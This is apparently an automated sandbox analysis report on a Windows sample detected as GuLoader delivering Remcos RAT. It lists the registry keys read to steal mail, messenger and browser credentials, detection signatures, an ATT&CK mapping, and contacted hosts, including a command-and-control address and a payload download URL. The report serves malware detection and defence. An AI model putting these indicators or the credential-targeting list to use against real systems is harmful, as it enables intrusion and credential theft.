              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: ESMTPPassword132_2_004033F0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword132_2_00402DB3
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword132_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 6596, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-13IBN7Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		11
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Credentials In Files              		129
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
              Masquerading              		LSA Secrets431
              Security Software Discovery              		SSH2
              Clipboard Data              		2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Virtualization/Sandbox Evasion              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture113
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Time Based Evasion              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              Time Based Evasion              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529110 Sample: asXlZG3aW6.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 50 newfarmn.pro 2->50 52 telesavers.co.za 2->52 54 geoplugin.net 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 7 other signatures 2->68 8 asXlZG3aW6.exe 34 2->8         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->42 dropped 44 C:\Users\user\AppData\Local\...\System.dll, PE32 8->44 dropped 76 Detected unpacking (changes PE section rights) 8->76 78 Submitted sample is a known malware sample 8->78 80 Tries to steal Mail credentials (via file registry) 8->80 82 6 other signatures 8->82 12 asXlZG3aW6.exe 4 19 8->12         started        17 cmd.exe 8->17         started        19 cmd.exe 8->19         started        21 62 other processes 8->21 signatures6 process7 dnsIp8 56 newfarmn.pro 41.216.188.178, 2404, 49736, 49737 AS40676US South Africa 12->56 58 telesavers.co.za 102.65.21.26, 443, 49735 Web-Africa-Networks-ASZA South Africa 12->58 60 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 12->60 46 C:\Users\user\AppData\...\Uforsvarlige.scr, PE32 12->46 dropped 48 C:\ProgramData\remcos\logs.dat, data 12->48 dropped 84 Detected Remcos RAT 12->84 86 Creates autostart registry keys with suspicious values (likely registry only malware) 12->86 88 Tries to harvest and steal browser information (history, passwords, etc) 12->88 90 3 other signatures 12->90 23 asXlZG3aW6.exe 12->23         started        26 asXlZG3aW6.exe 12->26         started        28 asXlZG3aW6.exe 12->28         started        30 Conhost.exe 17->30         started        32 Conhost.exe 19->32         started        34 Conhost.exe 21->34         started        36 Conhost.exe 21->36         started        38 Conhost.exe 21->38         started        40 59 other processes 21->40 file9 signatures10 process11 signatures12 70 Tries to steal Instant Messenger accounts or passwords 23->70 72 Tries to steal Mail credentials (via file / registry access) 23->72 74 Tries to harvest and steal browser information (history, passwords, etc) 26->74

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              asXlZG3aW6.exe55%ReversingLabsWin32.Trojan.Guloader

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr55%ReversingLabsWin32.Trojan.Guloader
              C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              telesavers.co.za
              		102.65.21.26
              		truefalse
                		unknown
                newfarmn.pro
                		41.216.188.178
                		truetrue
                  		unknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                      		unknown
                      newfarmn.protrue
                        		unknown
                        https://telesavers.co.za/EsbmqCxkb162.binfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREADasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.pki.goog/gsr1/gsr1.crl0;bhv2AA3.tmp.131.drfalse
                              		unknown
                              http://www.imvu.comrasXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                		unknown
                                https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://eb2.3lift.com/sync?asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://support.google.com/chrome/?p=plugin_flashasXlZG3aW6.exe, 00000083.00000003.21824645097.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824737604.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824954221.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.nirsoft.netasXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhv2AA3.tmp.131.drfalse
                                          		unknown
                                          https://deff.nelreports.net/api/report?cat=msnbhv2AA3.tmp.131.drfalse
                                            		unknown
                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comasXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		unknown
                                              https://telesavers.co.za/uasXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.com/recaptcha/api2/aframeasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.com/chrome/asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.google.comasXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      		unknown
                                                      http://o.pki.goog/wr20%bhv2AA3.tmp.131.drfalse
                                                        		unknown
                                                        http://geoplugin.net/json.gptnasXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/pageasXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://c.pki.goog/r/r1.crl0bhv2AA3.tmp.131.drfalse
                                                                    		unknown
                                                                    https://login.yahoo.com/config/loginasXlZG3aW6.exefalse
                                                                      		unknown
                                                                      https://www.msn.com/de-ch/?ocid=iehpasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.nirsoft.net/asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://ocsp.quovadisoffshore.com0asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.imvu.comataasXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhv2AA3.tmp.131.drfalse
                                                                                  		unknown
                                                                                  https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, bhv2AA3.tmp.131.drfalse
                                                                                    		unknown
                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000227D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819594967.000000000227D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://www.google.com/pagead/drt/uiasXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://geoplugin.net/json.gpgasXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.htmlasXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.imvu.com/asXlZG3aW6.exe, 00000085.00000002.21797163684.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://i.pki.goog/r1.crt0bhv2AA3.tmp.131.drfalse
                                                                                                  		unknown
                                                                                                  http://www.imvu.comasXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0bhv2AA3.tmp.131.drfalse
                                                                                                      		unknown
                                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://geoplugin.net/json.gpxasXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://geoplugin.net/json.gpwasXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://pki.goog/gsr1/gsr1.crt02bhv2AA3.tmp.131.drfalse
                                                                                                              		unknown
                                                                                                              http://nsis.sf.net/NSIS_ErrorErrorasXlZG3aW6.exefalse
                                                                                                                		unknown
                                                                                                                http://i.pki.goog/wr2.crt0bhv2AA3.tmp.131.drfalse
                                                                                                                  		unknown
                                                                                                                  https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAasXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819235993.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://nsis.sf.net/NSIS_ErrorasXlZG3aW6.exefalse
                                                                                                                        		unknown
                                                                                                                        https://www.msn.com/?ocid=iehpasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://ib.adnxs.com/async_usersync_fileasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
